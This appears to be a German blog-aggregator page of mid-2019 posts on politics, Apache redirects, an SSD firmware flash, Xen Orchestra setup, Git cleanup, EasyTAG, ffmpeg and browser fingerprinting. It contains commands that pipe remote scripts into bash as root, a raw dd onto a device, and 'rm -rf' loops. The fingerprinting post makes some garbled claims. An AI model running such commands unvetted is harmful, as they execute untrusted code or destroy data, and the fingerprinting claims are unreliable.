Ganz ähnlich argumentiert Beatrix von Storch in der Debatte zu Maßnahmen gegen Homo- und Transfeindlichkeit. Beides sei vor allem ein Problem der Moslems im Land, weshalb es einer „Strategie gegen die Islamisierung unseres Landes“ (Ebd., S. 12506) bedürfe. Immerhin packt sie das Ganze in ein anschauliches Bild: „Wenn die Fahne des Halbmondes steigt, wird die Fahne des Regenbogens brennen.“ (Ebd., S. 12506) Dass man sich in der Ablehnung von Homo- und Transsexualität nahe bei den Islamisten findet, macht die Abgeordnete Nicole Höchst deutlich: „Die Bürger sollen nun Homosexualität und Transsexualität nicht nur tolerieren; sie sollen sie akzeptieren. ‚Akzeptieren‘ – dieses Wort kommt aus dem Lateinischen und bedeutet ursprünglich ‚annehmen, gutheißen‘. Und was kommt denn dann als Nächstes? Wird Homo- und Transsexualität unter dieser verstrahlten Regierung noch zur Staatsnorm erhoben und somit zur heiligen Pflicht für jeden Bürger? (…) Mit Ihren unwissenschaftlichen Lügen über angebliche Vielfalt und Beliebigkeit legen Sie nicht nur die Axt an die Keimzelle unserer Gesellschaft, die Familien.“ (Ebd., S. 12512)

Zum Abschluss ein Bespiel, wie man gut vorbereitet die Behauptung der AfD, sie sei die Partei der Freiheit im Internet und Garantin von Pressefreiheit und Demokratie, ad absurdum führen kann. Anke Domscheit-Berg von der LINKEN gebührt der Dank dafür: https://dbtg.tv/fvid/7356034

Alle Debatten können hier nachgelesen werden:

http://dip21.bundestag.de/dip21/btp/19/19100.pdf

http://dip21.bundestag.de/dip21/btp/19/19101.pdf

http://dip21.bundestag.de/dip21/btp/19/19102.pdf

von admin am 30.05.2019 08:25

29.05.2019

Jörg Kruse (4A4B)

Wann mit Status Code 302 weiterleiten?

Weiterleitungen, die mit einer Redirect-Direktive oder mit mod_rewrite in einer .htaccess Datei definiert werden, werden meist mit HTTP-Status-Code 301 gesendet, um Browsern und Suchmaschinenbots zu signalisieren, dass der betreffende Inhalt nun dauerhaft auf die Ziel-URL umgezogen wurde. Gesetzt wird der Status 301 durch die Schlüsselwörter 301 oder permanent bzw. im Falle von mod_rewrite durch das Flag R=301.

Beispiele für eine 301-Weiterleitung einer kompletten Website unter Erhaltung der Pfade nach https://example.com:


Redirect 301 / https://example.com/


Redirect permanent / https://example.com/


RewriteEngine on
RewriteRule ^(.*)$ https://example.com/$1 [R=301,L]

Ohne die Schlüsselwörter würde mit Status Code 302 weitergeleitet, womit zum Ausdruck gebracht würde, dass der betreffende Inhalt nur vorübergehend an der Ziel-URL umgezogen wurde. Meistens ist dies wohl nicht der Fall. Lange Zeit galt zudem ein Status Code 302 sogar als gefährlich, nachdem vor vierzehn Jahren aufgrund eines Google-Bugs die Indexierung etlicher Webseiten gehijackt wurde.

Doch es kann Fälle geben, in welchen eine 302-Weiterleitung durchaus Sinn macht – hierzu zwei Beispiele.

1. Temporäre Weiterleitung

Ein Umzug von https://example.net nach https://example.com ist fest geplant aber noch nicht vollzogen. Externe Links können bereits jetzt auf https://example.com/ gesetzt werden. Damit die Links nicht ins Leer gehen, leitet die Domain dort mit einem Status Code 302 weiter auf https://example.net/, wo sich der Inhalt derzeit noch befindet.


Redirect 302 / https://example.net/

Am Ende des Umzugs wird zuerst die 302-Weiterleitung entfernt und abschließend auf example.net ein Redirect mit Status Code 301 in umgekehrter Richtung nach example.com eingerichtet:


Redirect 301 / https://example.com/

Vorteil an diesem Vorgehen ist, dass die Links nicht ein zweites Mal angepasst werden müssen.

2. Testen von Redirects

Da Browser und Suchmaschinen 301-Weiterleitungen cachen, kann es manchmal hilfreich sein, diese erst einmal mit Status Code 302 zu testen. Wenn man sich sicher ist, dass alles wie gewünscht funktioniert, kann (und sollte) der Status abschließend auf 301 geändert werden.

von Jörg am 29.05.2019 19:21

27.05.2019

(c3f2o)

EP-Wahlen 2019: Die Rechte im Aufwind

Die modernisierte radikale Rechte in Europa geht gestärkt aus den EP-Wahlen 2019 hervor. In Italien und Frankreich, zwei Gründungsländern der EU (EWG), sind Parteien dieses Typs zur stärksten Kraft geworden bzw. konnten diese Position behaupten. In Polen und Ungarn, wo die radikale Rechte Alleinregierungen stellt, konnten diese Parteien ihre Dominanz ausbauen. Die erst vor wenigen Monaten gegründete Brexit-Partei von Nigel Farage hat vor dem spezifischen Hintergrund der Situation in Großbritannien einen erdrutschartigen Sieg erzielt. Damit sind in den vier bevölkerungsreichsten EU-Staaten nach Deutschland (inhaltlich unterschiedliche) Parteien der modernisierten radikalen Rechten zu stärksten Kräften bei der Wahl zum Europäischen Parlament geworden.

In Deutschland ist die AfD von 7 Prozent auf 11 Prozent gewachsen. Vor dem Hintergrund, dass der Parteivorsitzende Meuthen noch im Dezember von einem Ergebnis um die 20 Prozent träumte, ist das Resultat als bescheidener Erfolg zu bewerten, der zeigt, dass sich die Erfolgskurve abflacht. Bei der Landtagswahl in Bremen wurde mit 6,9 Prozent bei einem Gewinn von 1,4 Prozent ebenfalls ein nur bescheidener Erfolg gefeiert. Der Blick auf die Ergebnisse in Ostdeutschland bewahrt jedoch vor einem zu frühen Abgesang: In Brandenburg (19,9 %) und Sachsen (25,3 %) ist die AfD vor der Union zur stärksten Kraft geworden und in Thüringen, Sachsen-Anhalt und Mecklenburg-Vorpommern belegt sie jeweils Platz zwei (vgl. ausführlich die Wahlanalyse von Horst Kahrs).

Trotz des Ibiza-Skandals konnte die FPÖ ihr Ergebnis bei einem Verlust von zwei Prozent knapp
halten. Das zeigt, dass die ideologische Bindung der Wählerinnen und Wählern der Partei so groß ist, dass sie auch einen solchen Skandal (vorerst) ohne massive Einbrüche überstehen kann. Am FPÖ- Beispiel wird auch deutlich, dass die modernisierte radikale Rechte zu einem fest verankerten Faktor der europäischen Politik geworden ist. Niederlagen und Verlusten in einzelnen Ländern stehen Zugewinne und Comebacks in anderen Ländern gegenüber.

So haben etwa die Dänische Volkspartei und auch die Wilders-Partei „Partei für die Freiheit“ in den Niederlanden deutliche Verluste hinnehmen müssen. Auch die neofaschistische „Goldene Morgenröte“ aus Griechenland hat ihr Ergebnis halbiert. Demgegenüber erlebte der Vlaams Belang in Belgien ein Comeback und konnte sein Ergebnis deutlich verbessern, ebenso die Schwedendemokraten.

In einigen Ländern ist die Rechte auf mehrere Parteien aufgesplittert. In Belgien hat die bis  Dezember 2018 an der Regierung beteiligte eher neoliberal ausgerichtete NVA Stimmen an den Vlaams Belang verloren, die sie zuvor von dort gewonnen hatte. In Ungarn hat die FIDEZ von Viktor Orban die früher neofaschistische Jobbik-Partei inzwischen rechts überholt, was zu Verlusten bei Jobbik führt. In Italien gibt es neben der Lega im neofaschistischen Spektrum noch die Fratelli d’Italia, die die radikale Rechte im Land weiter stärkt.

Die vollmündige Ankündigung von Lega-Chef Salvini, man werde Europas Geschichte verändern, ist angesichts der Gesamtstärke der europäischen Rechten weit weniger vermessen als in den Kommentierungen der vorläufigen Ergebnisse dargestellt. Die Politik der EU orientiert sich in den letzten Jahren klar am Aufstieg der radikalen Rechten in Europa und auch in zahlreichen EU-Staaten hat sich die politische Achse eindeutig nach rechts verschoben. Allerdings wird es dieser Rechten nur schwer gelingen, ihr Gesamtgewicht in Europa auf einer Waagschale zu bündeln. Das von Salvini und Le Pen geschmiedete Bündnis hat zwar deutlich zugelegt, unklar ist aber, wen man noch für eine Zusammenarbeit gewinnen kann, um zu einer tatsächlichen Kräfteverschiebung des EP nach Rechtsaußen zu kommen. Nicht zu erwarten ist etwa, dass sich Farage mit seiner Brexit-Partei diesem Bündnis anschließt und auch die PiS aus Polen wird sich nicht mit Russlandfreunden aus Frankreich, Italien oder Österreich verbünden wollen. Und ob Orban tatsächlich den Sprung nach ganz rechts wagt, bleibt abzuwarten.

von admin am 27.05.2019 08:31

19.05.2019

(thoys)

Datenschutz-Einstellungstipp: IPhone mit einem Hauch mehr Datenschutz

The Bug in Apple’s Latest Marketing Campaign
Ein einfacher Tipp, wie man sein IPhone etwas Datensicherer bekommt. Es geht um die Apple ID, denn wenn ihr Apps nutzt wird diese an Werbetreibende weitergegeben. Mozilla schreibt, dass man es sich am Besten so vorstellen soll, als ob jeder Verkäufer, bei dem man was gekauft hat einem danach zu anderen Läden hinterher läuft und schaut, was man anschaut und kauft. Der Artikel zeigt, wie man das abschaltet.

von Timotheus am 19.05.2019 13:16

16.05.2019

Marco Laspe (rockiger)

Probao-Case-Study: nutzerfreundlich, schnell und SEO-optimiert

Startseite: Probao.de

Heute möchte ich euch mein neues Projekt „Probao“ vorstellen. Auf Probao teste ich Online-Dienste, die ich selbst für nützlich halte. Dabei schreibe ich auf Probao über meine Erfahrungen mit den einzelnen Diensten und wie man sie am besten nutzt.

Mein Ziel mit Probao ist es Verbrauchern die Möglichkeiten aufzuzeigen, wie man sich das Leben mit Online-Diensten erleichtern kann und dabei auch noch den ein oder anderen Euro sparen kann.

Neben meinen persönlichen Erfahrungen, die ich in den Testberichten sehr ausführlich niederschreibe, findest du auf Probao auch noch Erfahrungsberichte von anderen Nutzern.

Anders als auf so vielen anderen Plattform, können die Nutzer aber nicht irgendwelche Erfahrungsberichte hochladen oder unsachliche Hasstiraden loslassen. Alle veröffentlichten Erfahrungsberichte müssen den Qualitätsstandard von Probao entsprechen.

Das heißt Hassberichte oder übertriebenes Lobeshymnen wirst du in den Erfahrungsberichten nicht finden. Nur Erfahrungsberichte, die einen Mehrwert für dich bieten, werden wir veröffentlichen.

Wenn du selbst Erfahrungen mit Online-Diensten gemacht hast, laden wir dich ein, diese auf Probao zu veröffentlichen. Du kannst jeden Monat eine 50 Euro Amazon-Gutschein gewinnen.

Technische Umsetzung

Die technische Umsetzung basiert wie bei meinen meisten Projekten auf WordPress. Mittlerweile setze ich für Content-Projekt eigentlich immer auf WordPress. Mit WordPress bekommt man einfach die meiste Funktionalität frei Haus.

Durch das riesige Angebot an Plugins kann man mit fast jede Art von Projekt schnell umsetzen. Darüber hinaus ist WordPress schnell und Suchmaschinen-freundlich.

Ich nutze bei Probao folgende Plugins:

Als Theme benutze ich eine Eigenentwicklung, die speziell aus SEO-Gesichtspunkten optimiert ist. So lade ich nur die Javascript– und CSS-Dateien, die ich wirklich will. Mein Ziel ist es so die Ladezeiten deutlich zu verkürzen. Vor allem mobile Nutzer sollen auch komfortabel Probao nutzen können.

Herausforderungen technischer Natur

Wie schon geschrieben, war ein zentrales Ziel die Ladezeiten so weit wie möglich zu verkürzen, um ein gutes Ergebnis beim PageSpeed Insights zu bekommen.

Ferner galt es auch die Testergebnisse auf Probao ordentlich darzustellen und sie gleichzeitig als Microformats mit semantischen Informationen zu versehen, damit Suchmaschinen die Inhalte besser verstehen.

Ein dritter Punkt war die Notwendigkeit schnell und einfach Querverlinkungen zwischen unterschiedlich Erfahrungsberichten herstellen zu können. Die Querverweise sollten optisch ansprechender als einfache Links und mehr Kontext für den Leser darstellen.

Minimierung der Ladezeiten

Um die Ladezeiten so kurz wie möglich zu halten, nutze ich im Großen und Ganzen drei Strategien. Als Allererstes lasse ich Probao bei einem ordentlichen auf WordPress spezialisierten Hostinganbieter laufen.

Dies sorgt schon für die nötigen technischen Einstellungen auf dem Server. Ich muss mich weder um Caching, Komprimierung noch HTTP-Version kümmern.

Darüber hinaus sorge ich mit zwei Plugins dafür, dass Bilder stark komprimiert werden und, wenn der Besucher sie denn auslesen kann, im neuen WebP-Format ausgeliefert werden. Dies erspart meinen Besuchern viele Kilobytes und einiges an Ladezeit.

Die wichtigste Maßnahme ist aus meiner Sicht die Reduzierung der Requests. Auch wenn durch HTTP2 mehrere Downloads gleichzeitig angestoßen werden können, ist das Zusammenfassen von JavaScript und CSS immer noch ein wichtiger Teil der Optimierung.

Üblich ist dafür die Nutzung bestimmter Caching-Plugins, die die Dateien der einzelnen Plugins und von WordPress zu jeweils einer einzigen CSS- und einer einzigen JavaScript-Datei zusammenfassen.

Allerdings hatte ich mit diesem Ansatz bisher einige Probleme. Manchmal wurde dadurch die Darstellung meines Themes verhunzt. Deswegen bin ich einen anderen Weg gegangen:

In meinem WordPress-Theme pflege ich die einzelnen JavaScript- und CSS-Dateien händisch ein. Im Produktivmodus werden diese jeweils in eine Datei zusammengefügt.

So kann ich sicherstellen, welches CSS und JavaScript in meinem Theme benutzt wird und habe trotzdem keine Probleme mit der Darstellung.

Darstellung der Testergebnisse und Microformats

Testergebnis und Microformat aus benutzerdefinierten Feldern.Testergebnis und Microformat aus benutzerdefinierten Feldern.

Eine weitere Herausforderung war die Darstellung der Testergebnisse. Zum einen wollte ich nicht jedes Mal eine Tabelle in das WordPress-Dokument einfügen. Zum anderen sollten die Daten auch als MicroFormat für Google zur Verfügung stehen.

Darüber hinaus gab es auf den Plan, zukünftig die Daten der Testberichte auch an anderer Stelle auf Probao zur Verfügung zu haben.

Aus diesem Grund werden die Testergebnisse nicht direkt im jeweiligen Testbericht gespeichert, sondern als benutzerdefinierte Felder, die jedem WordPress-Dokument zugeordnet werden können.

Das Probao-Theme stellt dann bei Vorhandensein bestimmter benutzerdefinierte Felder die entsprechenden Informationen zum Erfahrungsbericht dar.

The post Probao-Case-Study: nutzerfreundlich, schnell und SEO-optimiert appeared first on Rockiger.

von Marco am 16.05.2019 10:33

12.05.2019

Malte Schmidt (maltris)

Vom Erfolg, eine verschollene Samsung SSD-Firmware zu erhalten (MMCRE28G5MXP-0VB)

Im Beitrag “Vom Versuch, eine verschollene Samsung SSD-Firmware zu erhalten (MMCRE28G5MXP-0VB)“, beschrieb ich die Schwierigkeiten, eine 10 Jahre alte Firmware für eine 10 Jahre alte und eher unbekannte Samsung SSD zu erhalten.

Während meine Versuche ausschließlich in Sackgassen endeten, meldeten sich in den Kommentaren einige freundliche Leser, darunter einer mit unbekanntem Namen, der eine koreanische Seite verlinkte, auf der sowohl die passende Anleitung zum Firmware-Update, als auch die passenden Firmware-Daten in der aktuellst verfügbaren Version auffindbar waren.

Vorher-Nachher-Vergleich

Erste Performancetests nach dem Firmware-Update zeigen relativ gute Werte. In Anbetracht dessen, dass Schreib- und Leseperformance zuvor (Firmware VBM1801Q) bei

  • Schreibgeschwindigkeit sequenziell: 23.8 MB/s
  • Lesegeschwindigkeit sequenziell: 196 MB/s

lagen, erreiche ich jetzt (Firmware VBM1901Q) Werte von

  • Schreibgeschwindigkeit sequenziell: 194 MB/s
  • Lesegeschwindigkeit sequenziell: 220 MB/s

Ein beachtlicher Anstieg.

Firmware-Update mit DSRD und FreeDOS

Die Anleitung Samsungs ist an einigen Stellen unverständlich und sogar fehlerhaft, da zusätzlich zum genannten Paket noch FreeDOS oder ein vergleichbares Betriebssystem benötigt wird. Daher fasse ich hier nochmal alle Schritte zum Firmware-Update bequem und korrigiert zusammen:

wget http://www.ibiblio.org/pub/micro/pc-stuff/freedos/files/distributions/1.2/FD12FULL.zip
wget -O DSRD_2_1_0.zip http://cfile208.uf.daum.net/attach/1556E4104B7E8D3A01E9DA
unzip FD12FULL.zip
sudo dd if=FD12FULL.img of=/dev/sdX status=progress
mount /dev/sdX /mnt
mkdir /tmp/DSRD
unzip DSRD_2_1_0.zip -d /tmp/DSRD/
cp -R /tmp/DSRD/ /mnt/
umount /dev/sdX

Mit diesen Schritten ist der USB-Stick inklusive DSRD-Tool vorbereitet. Nun muss der Reboot erfolgen.

Das im Update-Prozess gewünschte “Power cycle” (Neustarten) der SSD habe ich hierbei nicht durchgeführt, da die SSD in meinem Notebook fest eingebaut war. Nach dem Firmware-Update und ohne die gewünschten “Power cycle” konnte ich jedoch keine Funktionsfehler feststellen.

SMART-Daten zurückgesetzt

Beim Firmware-Upgrade wurden jegliche SMART-Daten zurückgesetzt. Glücklicherweise konnte ich jedoch anhand der Laufzeit der zweiten SSD, ziemlich genau die Laufzeit bis zum Firmware-Update errechnen:

Damals:

SanDisk SDSSDH2128G
Laufzeit: 12542 Stunden

SAMSUNG MMCRE28G5MXP-0VB
Laufzeit: 17619 Stunden

Heute:

SanDisk SDSSDH2128G
Laufzeit: 15756 Stunden

SAMSUNG MMCRE28G5MXP-0VB
Laufzeit: 20833 Stunden

(15756-12542)+17619 = 20833 Stunden

Fazit

Nach fast einem 3/4 Jahr habe ich die passende Firmware erhalten, konnte diese auf die alte SSD flashen und erreichte damit, von mir unerwartete, verbesserte Schreibgeschwindigkeiten.

von maltris am 12.05.2019 10:16

10.05.2019

Stephan Tetzel (zefanja)

Xen Orchestra installieren und aktualisieren (Vollversion)

An unserer Schule verwenden wir  Citrix Hypervisor (ehemals XenServer) (bald xcp-ng) für die Virtualisierung unseres Schulservers und anderer Anwendungen. Citrix liefert mit XenCenter ein Verwaltungstool für Windows. Damit kann man bequem alle virtuellen Maschienen verwalten und Einstellungen am Citrix Hypervisor vornehmen. Eine andere Möglichkeit ist Xen Orchestra. Es ist ein webbasiertes Tool, was noch einiges mehr als XenCenter kann. Auf der Website kann man sich eine fertig eingerichtete Appliance herunterladen. Diese ist allerdings von den Features stark eingeschränkt (man hat ca. 2 Wochen Zeit alle Features zu testen). Deshalb möchte ich einen kleinen Tipp weitergeben, wie man Xen Orchestra installieren kann – mit allen Features der Enterprice und Premium Edition.

Xen Orchestra installieren

Xen Orchestra ist eine Open Source Projekt, deshalb kann es sich jeder selbst den Quellcode nehmen und installieren. Die Anleitung dazu findet man in der offiziellen Dokumentation. Auf Github findet man auch ein Installationsskript, welches die Installation automatisch durchführt. Damit kann man Xen Orchestra in wenigen Schritten installieren. Auf einem frischen Ubuntu LTS Server muss man nur die folgenden Befehle ausführen:

$ sudo bash
$ curl https://raw.githubusercontent.com/Jarli01/xenorchestra_installer/master/xo_install.sh | bash

Das war es auch schon 🙂 Xen Orchestra kann man nun unter IP des Servers erreichen. Der Standard-Benutzername ist admin@admin.net, das Password admin.

Xen Orchestra installieren

Xen Orchestra aktualisieren

Wenn man Xen Orchestra fertig eingerichtet hat und sollte man es natürlich aktuell halten, um alle Sicherheitsupdates und neue Features zu bekommen. Eigentlich bringt jede Version einige neue Features mit, welche die Arbeit mit dem XenServer (bzw. xcp-ng) erweitern oder erleichtern. Der Autor des Installationsskript stellt ein weiteres Skript für die Aktualisierungen bereit. Zu finden ist es ebenfalls auf Github.

Das Aktualisierungsskript bietet verschiedene Optionen an. Zum einfachen Aktualisieren reicht der folgende Aufruf:

$ sudo bash
$ sudo curl https://raw.githubusercontent.com/Jarli01/xenorchestra_updater/master/xo-update.sh | bash

Nach wenigen Minuten ist Xen Orchestra wieder auf den aktuellen Stand!

Wer sich unwohl dabei fühlt ein Skript aus dem Netz als root laufen zu lassen, kann sich das Skript natürlich vorher noch genau anschauen, was es macht bzw. nicht macht 🙂

Fazit

Xen Orchestra ist ein tolles Projekt. Unser XenServer lässt sich damit leicht verwalten. Backups sind schnell angelegt (seit neustem auch Backups der Konfiguration von Xen Orchestra) inklusiver Benachrichtigungen (eMail oder nach Slack / Mattermost). Diese beiden Skripts haben uns das Leben sehr erleichtert. Ein großes Dankeschön an Jarli01!

1 Kommentar

Der Beitrag Xen Orchestra installieren und aktualisieren (Vollversion) erschien zuerst auf .:zefanjas:..

von zefanja am 10.05.2019 12:24

07.05.2019

Malte Kiefer (beLI3VeR)

Entfernen von Dateien aus einer Git Repository

Immer wieder kommt es mal vor, das man bei der Arbeit mit einer Git Repository unbeabsichtigt Dateien in dieses Repository aufnimmt, die dort eigentlich nichts zu suchen haben. Sei es temporäre Dateien, wie zum Beispiel .DS_Store oder .~. Im späteren Verlauf ist es sehr ärgerlich diese Dateien wieder zu entfernen.

In diesem Beitrag möchte ich euch zeigen wir ihr diese Dateien aus der Repository entfernen könnt. Zwei Wege werde ich aufzeigen, einmal wo auch lokal diese Dateien entfernt werden und einmal wo die Dateien lokal bestehen bleiben.

Ausschließen von Dateien

In Git gibt es die Möglichkeiten bestimmte Dateien aus eine Repository auszuschließen. Dafür wurde von den Entwicklern von Git die Datei .gitignore geschaffen. In dieser einfach Textdatei kann man Zeilenweise Ordner, Dateien oder reguläre Ausdrücke aufnehmen um Dateien oder Ordner auszuschließen.

.DS_Store
*.~
...

Da es viele verschiedene Entwicklungsumgebungen und Programmiersprachen gibt und man nicht von allen die temporären Dateien kennen kann, haben sich einige Entwickler die Mühe gemacht, einen Generator für diese Datei zu entwickeln. Diese kann auf der folgenden Seite genutzt werden.

https://www.gitignore.io/

Entfernen von lokalen Dateien und Dateien in der Repository

Im folgenden gehe ich davon aus, dass ihr bereits eine .gitignore Datei angelegt habt. Diese wird jetzt benötigt um die entsprechenden Datei zu finden und zu löschen. Dazu könnt ihr den folgenden Befehl nutzen.

for f in $(cat .gitignore) ; do
  git rm -rf --ignore-unmatch "$f"
done && git add .gitignore && git commit -m "fix temp files" && git push origin master

Als Einzeiler

for f in $(cat .gitignore) ; do git rm -rf --ignore-unmatch "$f"; done && git add .gitignore && git commit -m "fix temp files" && git push origin master

Dieser Befehl findet alle diese Dateien nur, wenn diese bereits gestated wurden. Um die Datei zu finden und zu löschen bevor Sie gestated wurden muss der Befehl ein wenig angepasst werden:

for f in $(cat .gitignore) ; do
  rm -rf "$f"
done

Als Einzeiler

for f in $(cat .gitignore) ; do rm -rf "$f"; done

Bitte nur anwenden, wenn ihr wirklich wisst was ihr tut. Am besten vorher eine Sicherung anlegen

Entfernen Dateien in der Repository und behalten der lokalen Dateien

Als letztes gehen wir jetzt noch drauf ein, wie wir Dateien aus der Repository löschen aber die lokalen behalten. Dazu fügen wir nur eine kleine Option an den oberen Befehl an:

for f in $(cat .gitignore) ; do
  git rm -rf --cached --ignore-unmatch "$f"
done && git add .gitignore && git commit -m "fix temp files" && git push origin master

Als Einzeiler

for f in $(cat .gitignore) ; do git rm -rf --cached --ignore-unmatch "$f"; done && git add .gitignore && git commit -m "fix temp files" && git push origin master

Die Option --cached verhindert das Löschen der lokalen Dateien.

Und das war es auch schon. Jetzt sind wieder nur die wirklich wichtigen Dateien in unsere Repository.

von Malte Kiefer (malte.kiefer@mailgermania.de) am 07.05.2019 00:00

06.05.2019

Vinzenz Vietzke (vinz)

EasyTAG: Organisiere deine Musik unter openSUSE

Audiodateien in Formaten wie MP3, AAC und Ogg Vorbis haben Musik allgegenwärtig und tragbar gemacht. Mit dem explosionsartigen Wachstum der Speicherkapazität kannst du riesige Musikbibliotheken speichern. Aber wie hältst du all diese Musik organisiert? Tagge einfach deine Musik. Dann kannst du einfach lokal und in der Cloud darauf zugreifen. EasyTAG ist eine gute Wahl für die Kennzeichnung von Musik und ist unter openSUSE verfügbar.

Viele Audiodateitypen unterstützen das Tagging, einschließlich:

  • MP4, MP3, MP3, MP2
  • Ogg Speex, Ogg Vorbis, Ogg Opus
  • FLAC
  • MusePack
  • Monkey Audio

Installation von EasyTAG

EasyTAG ist einfach aus openSUSE-Repositories zu installieren:

Oder benutze Zypper in einem Terminal als Root:

# zypper install easytag

Dann startest du das Programm über das Anwendungsmenü auf deinem Desktop. Die unkomplizierte Benutzeroberfläche von EasyTAG eignet sich für die meisten Desktop-Umgebungen.

Musik taggen

Wähle einen Ordner aus, in dem du Musik hast, die du markieren möchtest. Standardmäßig lädt EasyTAG auch Unterordner. Du kannst jede Datei auswählen und Tag-Informationen wie Künstler, Titel, Jahr usw. hinzufügen. Du kannst auch Bilder im JPG- oder PNG-Format zu einer Datei hinzufügen, was die meisten Player auch verstehen.

Von dir geänderte Dateien werden in der Dateiliste fett gedruckt. Um alle zu speichern, drückst du Strg+S. Du kannst auch die gesamte Liste auswählen und mit Strg+Shift+S alle Dateien auf einmal speichern.

Eine der leistungsfähigsten Funktionen von EasyTAG ist der Dateiscanner. Der Scanner erkennt Muster auf der Grundlage einer von dir bereitgestellten Vorlage. Sobald du die richtigen Vorlagen und Scan-Dateien zur Verfügung gestellt hast, markiert EasyTAG automatisch alle für dich. Dann kannst du sie in großen Mengen speichern. Das spart viel Zeit und Frustration im Umgang mit großen Bibliotheken.

Wenn du deine getaggten Dateien zu einem Cloud-Service hochlädst, ermöglichen dir deine Tags, die gewünschte Musik jederzeit schnell zu finden und abzuspielen.

Dieser Artikel ist eine Adaption & Übersetzung von EasyTAG: Organize your music on Fedora unter der Creative Commons Lizenz.

von vinzv am 06.05.2019 20:38

Malte Kiefer (beLI3VeR)

Informationen zum Blog

Nach fast 7 Monaten komme ich endlich wieder dazu einen Blogbeitrag zu verfassen. In den nächsten Tagen und Wochen, werde ich versuchen meinen Beitragsreihen fortzuführen bzw. zu beenden. Ich möchte mich bei meinen Lesern entschuldigen, das ihr so lange nichts von mir gehört habt.

Kontaktinformationen

Die Kontaktinformationen haben sich verändert. So habe ich meinen alten Jabber Account raktiviert und meinen eignen XMPP Server aufgrund von Zeitmangel eingestellt. Auch gibt es einen aktuellen PGP Key, den es jetzt direkt auf meiner Seite zum Download gibt.

macOS

Zur Zeit ist macOS mein primäres Betriebssystem, was dazu führt, das meine Crux Ports gerade nicht aktuell gehalten werden. Zusätzlich dazu, werden sich meinen Blogbeiträge damit hauptsächlich auf die Nutzung von Linux auf Servern konzentrieren. Ab und zu, werden ich Beiträge zu OpenSource Software in der Verbindung mit iOS und macOS posten.

von Malte Kiefer (malte.kiefer@mailgermania.de) am 06.05.2019 00:00

03.05.2019

Steffen Rumberger (inne)

ffmpeg examples

cut up video

You can use the -ss option to specify a start timestamp, and the -t option to specify the encoding duration. The timestamps need to be in HH:MM:SS.xxx format or in seconds (s.msec). Note that -t is an output option and always needs to be specified after -i.

ffmpeg -ss HH:MM:SS -i in -t HH:MM:SS -c copy out

You can use -to instead of -t to specify the timestamp to which you want to cut. So, instead of -i <input> -ss 30 -t 10 you could also do -i <input> -ss 30 -to 40 to achieve the same thing. If your ffmpeg does not support -c, or -to, it is likely very outdated.

03.05.2019 17:39

19.04.2019

Marius M. M. (devilx)

The Detailed Guide to Browser Fingerprinting

Did you know that your fingerprint identity could be used to reveal your identity by analyzing your browsing activity? It is done in either of two ways; through client-side frameworks like Adobe flash player and Javascript or the server.

Fingerprint collection is a popular form of criminal forensic investigation whose results are matched against a database of known personalities to identify a particular person. Browser fingerprinting uses a similar technique to capture the identity of a specific person. An entire collection of browser identification points are matched against the browser’s characteristics of recorded people.

The underlying fact is that both forensic fingerprinting and browser fingerprinting are not capable of showing the real identity of a person, but are sure to reveal that a specific person performed certain similar activities.  You can also refer to browser fingerprinting as canvas fingerprinting.

The traditional way of finding out online identity was through surveillance of IP addresses. It follows that the TCP/IP protocol suite used by the internet requires every connection request to be sent with an IP address so that the web server easily locates where to send the requests.

Virtual Private Networks were born out of the need to conceal real IP addresses and have them replaced with an address borrowed from the VPN. The acquired IP address is shared among a large pool of users hence effectively maintaining online anonymity.

Therefore, internet web-server stores connection logs for the VPN IP address.  However, as with the shifting developments of technology; privacy penetrators noted that it was possible to track other information from a user’s browser apart from the IP address that had the potential to create identity leads.

What’s the Browser data be Collected?

So how is the tracking of surfer identity through unique browser activity even possible?

Much of what a browser sends out to the web server cannot be hidden or cleared. Matching the correlation between a specific user’s browser activity with one particular unique pattern of browser request could quickly reveal the user’s identity even while browsing on a VPN.

Corporates are also prevalent users of browser fingerprinting while identifying various audience segments that are useful for targeted advertising. Some websites also make use of the technique while detecting potential fraud. Such websites would be dating sites or banks.

Browser fingerprinting identifies someone’s unique site identity by analyzing each of the following inputs.

  • Encoding header
  • Language header
  • User agent header
  • Accept header
  • Connection header
  • Platform
  • Plugins list
  • Cookie settings
  • No/yes tracking of preferences
  • Use of session storage
  • Use of local storage
  • Images rendered with WebGL or HTML canvas element
  • Time zone
  • Adblock present or not
  • List of fonts used

The method is however limited to surfers changing into new browser versions. Therefore testing against a sample of browsing activities can be misleading because the results would test unique.

The record of test samples increases every day with increasing web traffic. Therefore, comparing the samples with shifting developments from old browsers and outdated test results is difficult. Additionally, a test result that would not show a user as unique is also a failed and misleading test. Any user’s test inputs are as unique as the sample size.

As earlier mentioned, fingerprinting can be done in two ways through the server-side collection or client-side collection.

Server Side Collection

Web access server logs can be used to record data sent by a user browser. The logs include data like requested URLs and protocols and requesting user IP address,  user agent string and the referer (SIC).

On the request end, the operating system, IP address and browser details will be included inside the user agent string.

Chrome/5.0 (Windows; Intel Windows 10_12_4) WindowsWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Chrome/603.1.30

When the user changes into a different browser, the standard nginx format will be maintained plus all details except for the browser name. Therefore, when a user logs into a connection, it is easy to determine their specific identity.

Since no two requests can come from different persons with the same IP address and the same browser version and operating system, additionally, the web server can be reconfigured to add more information to the browser logs through log format specifiers.

Cookies and type of content request are exchanged between the browser and the web server. It is such information plus headers that reveal information to the public and places internet users at the risk of browser fingerprinting.

Client Side Collection

Specific internet sites can reveal important private information of a person from a browser. Adobe flash player and Javascript are technology frameworks that can be used to crawl your browser data.

This method follows that the fingerprinting process takes into consideration the following factors; fonts available, list of plugins, screen resolution, system language, whether the browser accepts cookies and other items listed on the above list of inputs.

The client-side collection is useful in identifying a person who is using a VPN to hide their identity. VPNs make it difficult for intelligence to use the IP address as a favorable identification point. The client-side collection will avail a set of data that could help trace unique user information except for the IP address. Therefore, the client-side browser fingerprinting makes it easier to track identity without the need for an IP address.

Fingerprinting software can collect almost reveal 21 subsets of unique data identifiers. It is not possible for different people to share such a diverse range of data points. Although the law has not enforced any browser fingerprinting, evidence of more than ten identifying data sets can work as a substantial proof for conviction.

Browser Fingerprinting is your online identification

Browser Fingerprinting

Privacy Techniques that can help you Mitigate Browser Fingerprinting

When individuals find the need to be more private, they opt always to provide less or no private information. But is this a practical solution? Like how would you live holding back your truths in this world of global communication sophistication?

Take for instance the need for Facebook, WhatsApp, emails and a plethora of social sites that demand of you to fill in forms. These forms are meant to request from you certain specific information. Therefore, it means it is impossible to avoid leaving behind browser fingerprints at all.

The only option lies in privacy habits that would make it difficult for your browsing data points to correlate. Doing so means intelligence agencies would not be able to separate your identity from a pool of data sets. Hence, maintaining varying browsing identities.

